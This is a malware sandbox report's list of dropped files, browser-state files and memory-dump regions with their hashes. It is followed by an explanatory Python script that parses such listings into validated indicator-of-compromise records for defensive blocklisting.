| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\tmpA40B.tmp
| MD5 | 4a22948cd525b3dbb85bbe167aa2c623 |
| SHA1 | d91ad12d4d0c54fad4c35a7e428c6bd6a6f13ed9 |
| SHA256 | 08b3b44419026ca6276c75c651ff786bfb4c0b7227d2724382715062b5a57985 |
| SHA512 | 8a1c75ce1ed07d38e933d83a3a79913afba9d12853e6e28d2ab0e35677b48b04696f010ef239c2ab844ec8e315bf81790c64eb7db0245dfecead63133e8c2bb8 |
C:\Users\Admin\AppData\Local\Temp\tmpA4C8.tmp
| MD5 | 1a2f91a675eb0a0e46f4e48aa3a89293 |
| SHA1 | f49877e1f53148e951a01037d410f379c84f1c7e |
| SHA256 | 3e67fe40af4b41ae5f0223113b4917639b4e9efd74903742f91f78959b9c4fc3 |
| SHA512 | aec4487d7534e16a227fb52262a70d808962879ccc1856e7057c2a5e1c2db967e9b7a1d1bf287bb66454088519c8a27b60cde5dd15c81bedb1f4b59d32e36424 |
C:\Users\Admin\AppData\Local\Temp\tmpA522.tmp
| MD5 | d367ddfda80fdcf578726bc3b0bc3e3c |
| SHA1 | 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671 |
| SHA256 | 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0 |
| SHA512 | 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000057
| MD5 | b24045e033655badfcc5b3292df544fb |
| SHA1 | 7869c0742b4d5cd8f1341bb061ac6c8c8cf8544b |
| SHA256 | ce60e71ab0f5a6f0a61ee048ff379b355d72cd01fda773380b4b474b4273ec6c |
| SHA512 | 0496eab064778fe47802d7f79a536022de4a89d085457ad0d092597f93e19653f750b86f5649768e18f631505ff9792c421ba3a14b9d30522d731b5cd3d8206c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\aca503ce-3736-4b8f-8b23-c7fe25723e2e\index-dir\the-real-index~RFe58b31e.TMP
| MD5 | 81db69e74e1c12047e87148aca274a80 |
| SHA1 | 4c885376cdb3d76b5e9b42b86594c100ef9b20dd |
| SHA256 | d48d9b534219c163fd8600c9d999f577080c311e21a64ca657af94dfe921ecff |
| SHA512 | 4cacc8ee7dc0be5c5384e8bca07337f352b4f724df46a8f0a8999cc09fabb1a2f5727b2239919d5bec735d68c130f86c3daa8a51f62f84c490800f43f01e5e1c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\aca503ce-3736-4b8f-8b23-c7fe25723e2e\index-dir\the-real-index
| MD5 | 20f9f8f426afefca3b6e6975036c6125 |
| SHA1 | ad0dd7246702974dac440aafe3c3718d0d58fb16 |
| SHA256 | d137534f88f604915843965f88ea8b462f97093fcb9e3be624797b39ff46d077 |
| SHA512 | 493dcce0ac0c663097a3a69c0fb32cf7643eb662d7600dc3ede6bb0af3df2126e46f635603ca14b2b8f9a083769fbf263d17eea2b6062831fdc3bb888cb3ec7b |
memory/7936-1921-0x00007FF74F230000-0x00007FF74F7D1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 5c7b5e6435dc5a1cee286bf11381937e |
| SHA1 | 7fa67eb9cda7bc68a39d196e766a5ce75827303c |
| SHA256 | 6e8f8438307df81ea02a532aae80a2720cebb43071837a0cd0cbaf9461db964b |
| SHA512 | bc570a4f585ce20224dd5124479df8500a0783215ed41b355be611c8f87f668f67e844eeae0c7e815cae6516d230494689c5d4044afc16c818ded5276f9de9c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58d58b.TMP
| MD5 | fc42fc379c7114fa17c2063c4da70905 |
| SHA1 | f16a87fab21ea882aa1c86f2e7e76ff8c6131597 |
| SHA256 | 497ee981e47c98066b83346de2cbd9ab17ee21329d6eb4b4f551562ddeea2005 |
| SHA512 | cfdfdebed8f5618a143a3915d9083392b9a51cfbdd4a6a3bca09a96e8a9a61eb833d623bc31847ae23ce9f1a9a17e1a1bc43333d79235914ec07deb24c503f4e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\8f3103e4-1826-4e9a-840d-74364bf11190\index-dir\the-real-index
| MD5 | 401916364346d8e11c2d9c23efc21d20 |
| SHA1 | acc17952285ded5b3595c4a46d9bcaaa1b97568c |
| SHA256 | 9d9a18832dd659dfce9ca446bd1fe39b2b52067ad02a5ef3df3691d1de19f08c |
| SHA512 | 330f9969494659feef28421f6452183276f205fafcc21361ff89bdbaa3106eb8be060cc10220e0bd9f60269164fb91e07de58818e03964831b2f3a992624ebf5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\8f3103e4-1826-4e9a-840d-74364bf11190\index-dir\the-real-index~RFe58db86.TMP
| MD5 | bec3dd20e8ea203979917e2240d7a942 |
| SHA1 | c87c80187e3aa47ddd6ec74cf727da8725abd095 |
| SHA256 | 40963e9a751339c00b3a2ef5bfa72da026e8ffc40ad804c8703210c5b4aefc44 |
| SHA512 | 30c0a9769c0c7e8d58ae7d8d8652979b084636260779b57937f2d7c95bf7fbb6885503abb596ed5a49a26cae07d2407a069f5f5ec9e6693ea65c67b01aa3aa66 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 4bc73b68c64057afb28793709ba8042b |
| SHA1 | b78024ec36a582aa8e3d77364fc3a53e6169fefa |
| SHA256 | ce7417698779338833738ba0ac72b069a4d0350d1e196bec2e66c57ae957cbc7 |
| SHA512 | a109c6393fa97e60a1a63b49141301322d5b51583473715a55c41739f1ee79877c4bf4bae73535cc90032c29e5b43f9642d719aae2133ae776c34f1d6a2ae88c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 8d4dd8b664b71fc7dc73877d24ca24b1 |
| SHA1 | 5edf25ab691ec552de80701f928e04e92c334d81 |
| SHA256 | aeb951356e0f100b936f1bf89cbd5c812a1f1a19f8c76e68f03ba47a7c7d3011 |
| SHA512 | 74e32f762b161f6ed070b6886e7b1b2f29dbd1946b766378b19d0273e6c865b3e131a2fbf2fc99bd2018f781caad0d8fb5e9f980dd337d6a59833e836b87bea2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 88e8159984693ed88ecf3b942e3feac8 |
| SHA1 | 7d47ab833bfda6a1a0fb22458586bb6b9d054efd |
| SHA256 | 52b483ae10eba056b07a8f46f527a8536ae0c002d2660ad5609fbcb9337cfa64 |
| SHA512 | 0fe9e185b50e4a13ebc99741cbf7392ab2248074df0da0e5f80b259a47ed63dcf7c197ef8522d5aca435db6fb2e4207a1a0489777525e8dadace60b51078701c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ead1583b94a75850ccdaf25ae41f5742 |
| SHA1 | 079e150cd96ecc79f778ee0b3ff49de8c6bdcafc |
| SHA256 | 29f806c795fb4c1f1c15c630477d56db4d6e72380cd859c7ccf25f5b1408144c |
| SHA512 | 5c60e727f310c70d8ddcd9a5972638584c548666951407a62f2520facdb0219a00832a60f9bc025b480942ba50c2a5554814d04cde9a79492ab5a72f678219f8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8827228aa53b453e713434c433bea630 |
| SHA1 | 723a0d6a3153c2bc53e6d9a14b8d3dec42e6faa4 |
| SHA256 | a2e6416d61f2183ed5cc2f0929d0d844cf5f7b39234ed934d6147045e7d3a202 |
| SHA512 | 8e1865af146966e2c53874084dd656af794f28b6e28d17dfe1395b1e32522fe0c8ccb67ba28669168d340733c9fb368ca13c0aceb37275e80f46d5dce0db21b2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 4f0d66515b92de659f697cd16637b885 |
| SHA1 | 04b5041d68326969e8d69689f5913e8e4af3f0de |
| SHA256 | 08d7043eda3a3040b308e0480be29bb56ec1cb7fb34495161a148d28b7f620fd |
| SHA512 | 5d2de8ed9961702c401c6993891c54bca0675d61493d25a3bdf51d296f7321061df118ce8784438f1d3d689a2e6d3b2a0dc6bf168e8b5a4e621f762ba7cb3927 |
memory/8000-2338-0x0000000000400000-0x00000000008DF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\114462139309
| MD5 | 77ab04d84487e70084dafa9befb16b16 |
| SHA1 | fce24f947f472c1635430f974e79e0d7ce914634 |
| SHA256 | ad46204f34307b2abd77d2665f9212eced255a19b5827d44eaabb0f149c7353f |
| SHA512 | 0395160ceb171a14b82fd6dab80da544963785743ddcfe63fc37df54d6b1eb246019f315c9bc1cb8931429067c3b5bb2671d4fe410c03edcefde54b3f6b29a79 |
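The listing above is a flattened sandbox dump: each dropped-file path is followed by its MD5/SHA1/SHA256/SHA512 rows, and `memory/<pid>-<seq>-<start>-<end>-memory.dmp` lines mark process memory regions that were captured. To use it as threat intelligence it has to be turned into structured records, and the digests should be checked for the truncation and garbling that extraction often introduces. The Python below is an added example, not part of the sandbox report; the sample input is copied from a few entries on this page, plus one constructed record with deliberately bad rows to exercise the validation. It also reports paths that appear more than once with different SHA256 values, which is how this listing records a file being rewritten during the detonation (for example the two `114462139309` entries).

```python
"""Parse a flattened sandbox dropped-file / memory-dump listing into IOC records.

Added example; not code from the sandbox or the report. SAMPLE_LISTING is a
handful of entries copied from the listing on this page plus one constructed
record (marked below) whose hash rows are intentionally malformed.
"""
import re
from collections import defaultdict

# Expected hex-digit count per digest; anything else is truncation or garbling.
HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*(.*?)\s*\|$")
MEM_LINE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

SAMPLE_LISTING = r"""
memory/6908-1377-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
| MD5 | b6d627dcf04d04889b1f01a14ec12405 |
| SHA1 | f7292c3d6f2003947cc5455b41df5f8fbd14df14 |
| SHA256 | 9da10d7b75c589f06f1758ed8e3c0335b9a738d0ad1317c48e380bca768bdddf |
| SHA512 | 1eef46fcb568049edad6a6dac0ce6532185f15d2b4f9939853226a4f24e0732f637951c98f580efdb98ef396d3f4d9846bccffa22c0309b455432c98292af937 |
C:\Users\Admin\AppData\Local\Temp\114462139309
| MD5 | 0a3c2b32bf6905a00597314feb170a5d |
| SHA256 | cd270775aae1a0014debd8b8ea2fd31b1e069c6ad459a7f4bc069166ed5c0646 |
C:\Users\Admin\AppData\Local\Temp\114462139309
| MD5 | 77ab04d84487e70084dafa9befb16b16 |
| SHA256 | ad46204f34307b2abd77d2665f9212eced255a19b5827d44eaabb0f149c7353f |
C:\Users\Admin\AppData\Local\Temp\constructed-example.bin
| MD5 | not-a-hash |
| SHA1 | deadbeef |
"""
# The last record above is constructed to show what the validator flags.


def parse_listing(text):
    """Return (files, dumps, problems).

    files:    one {"path", "hashes"} dict per path line, in page order; a path
              listed twice yields two records (the file was written twice).
    dumps:    {"pid", "seq", "start", "end", "size"} per memory-dump line.
    problems: strings describing hash rows that failed validation; those
              digests are left out of the record rather than stored as-is.
    """
    files, dumps, problems = [], [], []
    current = None
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = MEM_LINE.match(line)
        if m:
            pid, seq, start, end = m.groups()
            start_i, end_i = int(start, 16), int(end, 16)
            dumps.append({"pid": int(pid), "seq": int(seq), "start": start_i,
                          "end": end_i, "size": end_i - start_i})
            current = None  # a dump line ends the previous file record
            continue
        m = HASH_ROW.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if current is None:
                problems.append(f"line {lineno}: {algo} row with no preceding path")
                continue
            if not re.fullmatch(r"[0-9a-f]+", digest):
                problems.append(f"line {lineno}: {algo} value is not hex: {digest!r}")
                continue
            if len(digest) != HASH_LENGTHS[algo]:
                problems.append(f"line {lineno}: {algo} has {len(digest)} hex digits, "
                                f"expected {HASH_LENGTHS[algo]}")
                continue
            current["hashes"][algo] = digest
            continue
        # Any other non-empty line is a file path that opens a new record.
        current = {"path": line, "hashes": {}}
        files.append(current)
    return files, dumps, problems


def paths_with_multiple_versions(files):
    """Map path -> sorted distinct SHA256 list, for paths written more than once with different content."""
    seen = defaultdict(set)
    for rec in files:
        if "SHA256" in rec["hashes"]:
            seen[rec["path"]].add(rec["hashes"]["SHA256"])
    return {path: sorted(hashes) for path, hashes in seen.items() if len(hashes) > 1}


if __name__ == "__main__":
    files, dumps, problems = parse_listing(SAMPLE_LISTING)
    for rec in files:
        print(rec["path"], rec["hashes"].get("SHA256", "<no valid SHA256>"))
    for d in dumps:
        print(f"pid {d['pid']} dump #{d['seq']}: 0x{d['start']:X}-0x{d['end']:X} ({d['size']} bytes)")
    for p in problems:
        print("PROBLEM:", p)
    print("rewritten paths:", paths_with_multiple_versions(files))
```

Feed the whole listing to `parse_listing` and the SHA256 set becomes a blocklist you can hand to EDR or a hash-lookup service, while `problems` tells you which rows not to trust. Records under `AppData\Local\Microsoft\Edge\User Data` are browser state touched during the run rather than attacker binaries; filter on path before treating a hash as a malware indicator.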